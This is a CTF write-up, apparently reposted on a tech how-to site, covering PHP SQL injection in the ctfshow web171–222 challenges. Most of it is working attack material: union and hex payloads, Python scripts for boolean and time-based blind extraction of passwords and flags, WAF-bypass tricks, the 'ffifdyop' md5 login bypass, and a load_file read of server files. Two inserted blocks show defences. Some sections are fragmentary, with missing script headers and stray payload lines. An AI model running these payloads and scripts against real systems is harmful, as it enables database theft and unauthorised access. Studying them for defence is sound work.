2025-01-18 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
What are the common SQL injection types in PHP? Many people without much experience don't know where to start, so this article summarizes the causes of the problem and how to deal with it. I hope it helps you solve it.
1. Unfiltered injection
web171 ~ union (joint) injection
// splice the SQL statement to look up the user with the specified id
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
Go straight in:
1'--+
On success this echoes the password of the user whose id is 1.
1' order by 3--+
The echo positions are revealed:
-1' union select 1,2,3--+
Reveal the database name ctfshow_web:
-1' union select 1,2,database()--+
Reveal the table name ctfshow_user:
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+
Reveal the column names id, username, password:
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' and table_schema=database()--+
Expose the contents of the fields:
You can also capture the request, find the API and hit it directly:
http://96977979-97ee-410a-8c0f-bd0b2883bd95.chall.ctf.show/api/?id=1'or1--+&page=1&limit=10
web172
I won't walk through the process again; directly:
-1' union select 1,group_concat(username,password) from ctfshow_user2--+
web173 ~ hex encoding
Query statement
// splice the SQL statement to look up the user with the specified id
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
Return logic
// check whether the result contains flag
if(!preg_match('/flag/i', json_encode($ret))){
  $ret['msg']='query success';
}
The filter: the returned string may not contain flag.
So we simply hex-encode it:
-1' union select 1,2,hex(group_concat(username,password)) from ctfshow_user3--+
web174 ~ Boolean blind injection (Python script)
Query statement
// splice the SQL statement to look up the user with the specified id
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
Return logic
// check whether the result contains flag or a digit
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
  $ret['msg']='query successful';
}
Nothing echoes back, so all that is left is blind injection.
1' and ascii(substr((select password from ctfshow_user4 where username='flag'),1,1))=102--+
Verified: blind injection works. The ASCII value of the first character is 102, that is, f.
Write a script.
# @Author: yanmie
import requests

url = "http://d273060e-9119-43c3-9737-acf668088663.chall.ctf.show/api/v4.php?id=1' and "
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"}
i = 0
j = 1
result = ""
while True:
    i += 1
    # compare the j-th character of the flag user's password with the ASCII value i
    payload = "ascii(substr((select password from ctfshow_user4 where username='flag'),{j},1))={i}--+"
    payload = payload.format(j=j, i=i)
    response = requests.get(url=url + payload, headers=headers)
    if "admin" in response.text:
        result += chr(i)
        print(result)
        i = 0
        j += 1
    if i == 128:
        break
print(result)
Well, the self-incrementing script took a while to finish running.
Then write a binary-search (dichotomy) script:
# @Author: yanmie
import requests

url = "http://d273060e-9119-43c3-9737-acf668088663.chall.ctf.show/api/v4.php?id=1' and "
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"}
i = 0
result = ""
while True:
    head = 0
    tail = 127
    i += 1
    # binary search on the ASCII value of the i-th character
    while head < tail:
        mid = (head + tail) // 2
        payload = "ascii(substr((select password from ctfshow_user4 where username='flag'),{},1))>{}--+".format(i, mid)
        response = requests.get(url=url + payload, headers=headers)
        if "admin" in response.text:
            head = mid + 1
        else:
            tail = mid
    if head == 0:
        break           # past the end of the string
    result += chr(head)
    print(result)
print(result)
web186
Query statement
// splice the SQL statement to count the rows of the given table
$sql = "select count(*) from ".$_POST['tableName'].";";
Return logic
// filter the passed parameter
function waf($str){
  return preg_match('/\*|\x09|\x0a|\x0c|\x0d|\xa0|%|\^|\x00|#|\x23|[0-9]|file|=|or|\x7c|select|and|flag|into|where|\x26|\'|"|union|`|sleep|benchmark/i', $str);
}
Query result
// returns the total number of records in the user table
$user_count = 0;
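Added example (not from the original write-up): the web186 blocklist above ported to Python's re, run against a constructed table-name payload in the shape this write-up uses (numbers spelled as true+true so no digit appears), and compared with an allowlist that only accepts a bare identifier. The blocklist lets the payload through; the allowlist does not.

```python
import re

# The web186 blocklist, ported from the PHP preg_match above (same alternatives, /i flag).
WAF = re.compile(
    r"\*|\x09|\x0a|\x0c|\x0d|\xa0|%|\^|\x00|#|\x23|[0-9]|file|=|or|\x7c|select|and|flag"
    r"|into|where|\x26|'|\"|union|`|sleep|benchmark",
    re.IGNORECASE,
)

# Allowlist: a table name is a bare SQL identifier and nothing else.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")

def blocked_by_waf(table_name: str) -> bool:
    """True when the blocklist rejects the value (mirrors preg_match() returning 1)."""
    return WAF.search(table_name) is not None

def allowed_by_identifier_check(table_name: str) -> bool:
    """True when the value is a plain identifier that may be interpolated."""
    return IDENTIFIER.fullmatch(table_name) is not None

def digitless(n: int) -> str:
    # Constructed: spell the integer n as true+true+... so that [0-9] never matches
    return "+".join(["true"] * n)

# Constructed inputs: a legitimate table name and a join-based payload of the
# kind the write-up's script sends, with every number written via digitless().
LEGIT = "ctfshow_user"
PAYLOAD = ("ctfshow_user as a right join ctfshow_user as b on "
           f"(substr(b.pass,{digitless(6)},{digitless(1)}) regexp (char({digitless(102)})))")

def evaluate() -> dict:
    """Run both checks on the legitimate name and on the payload."""
    return {
        "legit_waf_blocks": blocked_by_waf(LEGIT),
        "legit_allowlisted": allowed_by_identifier_check(LEGIT),
        "payload_waf_blocks": blocked_by_waf(PAYLOAD),                # False: bypassed
        "payload_allowlisted": allowed_by_identifier_check(PAYLOAD),  # False: rejected
    }
```

The blocklist fails because the payload needs none of the banned tokens (no digits, no "=", no quotes), while the allowlist rejects anything that is not a single identifier.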
You can reuse the script from the previous question.
# @Author: yanmie
import requests

url = "http://f9cb7903-66ce-445d-874a-b54de32dd8da.chall.ctf.show/select-waf.php"
payload = "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{},{}) regexp (char({})))"
i = 5
flag = "flag{"

def createNum(n):
    # spell the number n as true+true+... so the waf's [0-9] check never fires
    num = 'true'
    if n == 1:
        return 'true'
    for i in range(n - 1):
        num += '+true'
    return num

while True:
    i += 1
    for j in range(127):
        data = {"tableName": payload.format(createNum(i), createNum(1), createNum(j))}
        response = requests.post(url=url, data=data)
        if "$user_count = 43;" in response.text:
            if chr(j) != ".":      # '.' matches anything in a regexp, skip it
                flag += chr(j)
            break
    print(flag.lower())
    if chr(j) == '}':
        break
web187 ~ md5 SQL injection
Query statement
// splice the SQL statement to look up the specified user
$sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
Return logic
$username = $_POST['username'];
$password = md5($_POST['password'], true);
// only admin can get the flag
if($username!='admin'){
  $ret['msg']='username does not exist';
  die(json_encode($ret));
}
The md5() function takes two arguments: the string to hash, and an optional output format.
The second argument selects hexadecimal or binary output:
TRUE - raw 16-character binary format
FALSE - default; 32-character hexadecimal string
But when the query is assembled, the raw bytes are inserted as a string, and if that string contains 'or' it is spliced into the original query as SQL.
That is, once the password is hashed to raw bytes and turned into a string, it contains 'or' followed by xxx.
Supply the string: ffifdyop
Its md5 is 276f722736c95d99e921722cf9ed621c
Read as a string it begins: 'or'6
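Added example (not part of the original write-up) showing why the raw-binary md5 is dangerous: the 16 bytes of md5('ffifdyop') are spliced into the query as text beginning 'or'6, next to the hex-digest, parameterised version. An in-memory SQLite table stands in for MySQL; both engines treat a string such as '6...' as the number 6 in a boolean context, so the comparison behaves the same way.

```python
import hashlib
import sqlite3

def md5_hex(password: str) -> str:
    """PHP md5($p) default: 32 hex characters, never contains a quote."""
    return hashlib.md5(password.encode()).hexdigest()

def md5_raw_as_text(password: str) -> str:
    """PHP md5($p, true): 16 raw bytes, which PHP splices into the SQL as-is."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")

def vulnerable_query(username: str, password: str) -> str:
    # Same shape as the web187 query: string splicing with the raw digest.
    pw = md5_raw_as_text(password)
    return (f"select count(*) from ctfshow_user where username = '{username}' "
            f"and password='{pw}'")

def safe_query(username: str, password: str):
    # Hex digest plus bound parameters: the digest can never close the quote.
    return ("select count(*) from ctfshow_user where username = ? and password = ?",
            (username, md5_hex(password)))

def demo() -> dict:
    # Constructed data: one admin row whose real password is not 'ffifdyop'.
    con = sqlite3.connect(":memory:")
    con.execute("create table ctfshow_user(username text, password text)")
    con.execute("insert into ctfshow_user values ('admin', ?)",
                (md5_hex("correct-horse"),))
    # The spliced query becomes ... and password='' or '6...' and matches the row.
    vuln = con.execute(vulnerable_query("admin", "ffifdyop")).fetchone()[0]
    sql, params = safe_query("admin", "ffifdyop")
    safe = con.execute(sql, params).fetchone()[0]
    return {"raw_prefix": md5_raw_as_text("ffifdyop")[:5],
            "vulnerable_count": vuln, "safe_count": safe}
```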
web188 ~ where logical condition
Query statement
// splice the SQL statement to look up the specified user
$sql = "select pass from ctfshow_user where username = {$username}";
Return logic
// username check
if(preg_match('/and|or|select|from|where|union|join|benchmark|,|\(|\)|\'|"/i', $username)){
  $ret['msg']='illegal username';
  die(json_encode($ret));
}
// password check
if(!is_numeric($password)){
  $ret['msg']='password can only be numeric';
  die(json_encode($ret));
}
// password judgment
if($row['pass']==intval($password)){
  $ret['msg']='login succeeded';
  array_push($ret['data'], array('flag'=>$flag));
}
Here the password is restricted to numbers, but the comparison is a weak one: 0==admin.
The username also has many restrictions, but there are still plenty of tricks.
select * from users where first_name=0; select * from users where first_name=1
LOCATE(substr, str, pos) -> returns the position of the first occurrence of the substring substr in the string str, starting at pos. If substr is not in str, the return value is 0.
POSITION(substr IN str) -> returns the position where the substring substr first appears in the string str. If substr does not exist in str, the return value is 0.
Construct the payload:
username=if(locate("flag{",load_file('/var/www/html/api/index.php'))>0,0,1)&password=1
Page return
{"code": 0, "msg": "\u5bc6\u7801\u9519\u8bef", "count": 0, "data": []}
So the flag really is in this file.
Write a script:
Idea: first find the position of flag, then from that position use binary search to get each character and concatenate them into the flag.
# @Author: yanmie
import requests

url = "http://54e509b4-af7d-4ba0-95cd-c84c9a7d0886.chall.ctf.show/api/index.php"

def getFlagPos():
    # username=0 selects admin and the page answers "password wrong" (\u5bc6\u7801\u9519\u8bef);
    # username=1 matches no user, so the message tells us which branch of if() ran
    payload = "if(locate('flag{',load_file('/var/www/html/api/index.php'))>%d,0,1)"
    head = 0
    tail = 1000
    while head < tail:
        mid = (head + tail) // 2
        data = {"username": payload % mid, "password": 1}
        response = requests.post(url=url, data=data)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in response.text:
            head = mid + 1      # locate(...) > mid holds
        else:
            tail = mid
    return head
Write a script:
Self-incrementing method:
# @Author: yanmie
import requests

url = "http://404d8d96-01d3-4d8e-a14e-aaf5c80a5d67.chall.ctf.show/api/"
payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(2),0)"
i = 0
table = ""
while True:
    i += 1
    for j in range(127):
        data = {"debug": 1, "ip": payload.format(i, j)}
        try:
            response = requests.post(url=url, data=data, timeout=1)
        except Exception as e:
            break               # timed out: character i has ASCII value j
    else:
        break                   # no value matched: end of the string
    table += chr(j)
    print(table.lower())
# get ctfshow_flagx,ctfthow_info
It's a bit slow, so I wrote a binary-search version:
# @Author: yanmie
import requests

url = "http://1a8ae547-99fa-47fe-b1a2-7a163a579dcf.chall.ctf.show/api/"
# payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0)"  # get ctfshow_flagx,ctfthow_info
# payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))>{},sleep(2),0)"  # get id,flaga,info
payload = "if(ascii(substr((select group_concat(flaga) from ctfshow_flagx),{},1))>{},sleep(3),0)"  # get flag
i = 0
result = ""
while True:
    i += 1
    head = 0
    tail = 127
    # binary search on the ASCII value: a timeout means the condition was true
    while head < tail:
        mid = (head + tail) // 2
        data = {"debug": 1, "ip": payload.format(i, mid)}
        try:
            requests.post(url=url, data=data, timeout=1)
            tail = mid          # no delay: ascii <= mid
        except Exception:
            head = mid + 1      # delay: ascii > mid
    if head == 0:
        break                   # past the end of the string
    result += chr(head)
    print(result)
Where sleep is filtered, the delay comes from a Cartesian product instead:
1,(SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C),0)
web220
function waf($str){
  return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i', $str);
}
Use ord instead of ascii
Use locate instead of substr
Use Cartesian product
6. Other injection
web221 ~ limit injection
Query statement
/ / pagination query
$sql = "select * from ctfshow_user limit ($page-1)*$limit,$limit";
Return logic
// TODO: it's safe and needs no filtering.
// if you even get the database name, you win.
LIMIT can be followed by two clauses, PROCEDURE and INTO. INTO requires write permission, which is uncommon, and PROCEDURE has been deprecated since MySQL 5.7.
P Niu's article
Payload:
http://1c1edfaa-f567-4fba-a04f-285c886e937d.chall.ctf.show/api/?page=2&limit=1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)
web222 ~ group by injection
Query statement
/ / pagination query
$sql = "select * from ctfshow_user group by $username";
Return logic
// TODO: it's safe and needs no filtering.
Blind injection can be used.
Payload:
http://84f3c1f3-59e9-47e4-9855-c2af4f32432d.chall.ctf.show/api/?u=if((1=2),username,0)&page=2&limit=10
Script:
# Author: yanmie
import requests

url = "http://84f3c1f3-59e9-47e4-9855-c2af4f32432d.chall.ctf.show/api/"
# payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},username,0)"  # get ctfshow_flaga,ctfshow_user
# payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'),{},1))>{},username,0)"  # get id,flagaabc,info
payload = "if(ascii(substr((select group_concat(flagaabc) from ctfshow_flaga),{},1))>{},username,0)"  # get flag
result = ""
i = 0
while True:
    i += 1
    head = 0
    tail = 127
    while head < tail:
        mid = (head + tail) // 2
        response = requests.get(url=url, params={"u": payload.format(i, mid), "page": 2, "limit": 10})
        # grouping by username gives many groups, so page 2 has rows only when the
        # condition is true; grouping by the constant 0 leaves page 2 empty
        if response.json().get("data"):
            head = mid + 1
        else:
            tail = mid
    if head == 0:
        break
    result += chr(head)
    print(result)

Payloads surviving from the next script (its header is lost on this page):
# payload = "ctfshow' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(0.5),1) and '1"  # get banlist,ctfshow_user,flag233333
# payload = "ctfshow' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1))>{},sleep(0.5),1) and '1"  # get id,flagass233,info
payload = "ctfshow' and if(ascii(substr((select group_concat(flagass233) from flag233333),{},1))>{},sleep(1),1) and '1"